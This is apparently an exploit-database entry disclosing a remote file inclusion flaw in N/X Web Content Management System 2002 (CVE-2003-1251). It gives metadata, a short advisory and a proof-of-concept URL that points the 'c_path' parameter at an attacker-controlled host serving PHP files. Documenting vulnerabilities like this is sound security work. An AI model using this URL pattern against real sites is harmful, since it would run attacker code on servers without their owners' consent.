N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion
Author: frog
type: webapps
platform: php
port:
date_added: 2003-01-02
date_updated: 2012-10-20
verified: 1
codes: CVE-2003-1251;OSVDB-56395
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/6500/info
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php